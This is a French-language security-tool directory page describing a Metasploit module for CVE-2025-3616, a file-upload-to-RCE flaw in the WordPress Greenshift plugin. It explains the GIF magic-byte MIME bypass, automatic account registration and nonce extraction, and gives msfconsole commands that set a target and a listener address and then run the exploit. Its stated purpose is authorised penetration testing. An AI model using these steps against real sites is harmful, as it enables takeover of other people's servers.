Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3616 — Module Metasploit exploitant le téléchargement de fichier arbitraire dans le plugin WordPress Greenshift (CVE-2025-3616) pour réaliser une RCE via l'usurpation MIME, avec auto-enregistrement et extraction de nonce. | Kitploit
Outils/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Frameworks d'ExploitationAnalyse des VulnérabilitésExploitation d'Applications WebTests d'IntrusionAuthentificationDéveloppement de Charges Utiles
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Module Metasploit exploitant le téléchargement de fichier arbitraire dans le plugin WordPress Greenshift (CVE-2025-3616) pour réaliser une RCE via l'usurpation MIME, avec auto-enregistrement et extraction de nonce.

Voir le dépôt
2il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Module Metasploit : Téléversement de fichier arbitraire dans le plugin WordPress Greenshift (CVE-2025-3616)

Ce dépôt contient un module Metasploit pour exploiter CVE-2025-3616, une vulnérabilité de téléversement de fichier arbitraire dans le plugin WordPress Greenshift (versions 11.4 à 11.4.5).

L'exploit permet aux utilisateurs authentifiés (Subscriber+) de téléverser des fichiers arbitraires, menant à une exécution de code à distance (RCE). Il contourne la validation du type de fichier du plugin en usurpant le type MIME à l'aide d'octets magiques GIF (GIF89a;).

Fonctionnalités

  • Gestion de l'authentification : prend en charge la connexion avec des identifiants existants (USERNAME/PASSWORD).
  • Auto-inscription : inclut une option REGISTER pour inscrire automatiquement un nouvel utilisateur et exploiter la vulnérabilité à l'aide des nouveaux cookies de session (utile si l'inscription est activée sur la cible).
  • Extraction de nonce : récupère automatiquement le nonce wp_rest requis depuis le tableau de bord d'administration.
  • Contournement de sécurité : préfixe le payload PHP avec des octets magiques GIF pour contourner la vérification de finfo_file().
  • Installation

    1. Assurez-vous d'avoir Metasploit Framework installé.

    2. Copiez wp_greenshift_file_upload.rb dans votre répertoire de modules local :

      root@kitploit:~
      mkdir -p ~/.msf4/modules/exploits/unix/webapp/
      cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
      
    3. Démarrez msfconsole et rechargez les modules :

      root@kitploit:~
      msfconsole
      msf6 > reload_all
      

    Utilisation

    1. Utilisation de l'auto-inscription (recommandé)

    Si l'inscription des utilisateurs est activée sur la cible, vous n'avez pas besoin d'identifiants.

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER true
    run
    

    2. Utilisation d'identifiants existants

    Si vous disposez déjà d'un utilisateur valide (Subscriber ou supérieur) :

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER false
    set USERNAME <USER>
    set PASSWORD <PASS>
    run
    

    Options

    OptionRequisDescription
    RHOSTSouiL'adresse de la cible
    LHOSTouiL'adresse d'écoute (votre IP)
    REGISTERnonDéfinissez sur true pour inscrire automatiquement un nouveau compte (par défaut : false)
    USERNAMEnonNom d'utilisateur WordPress (requis si REGISTER est false)
    PASSWORDnonMot de passe WordPress (requis si REGISTER est false)
    EMAILnonE-mail pour l'inscription (facultatif, généré automatiquement si vide)

    Avertissement

    Ce module est destiné uniquement à des fins éducatives et à des tests d'intrusion autorisés. L'utilisation de ce code pour attaquer des cibles sans consentement mutuel préalable est illégale.

    Télécharger l’outil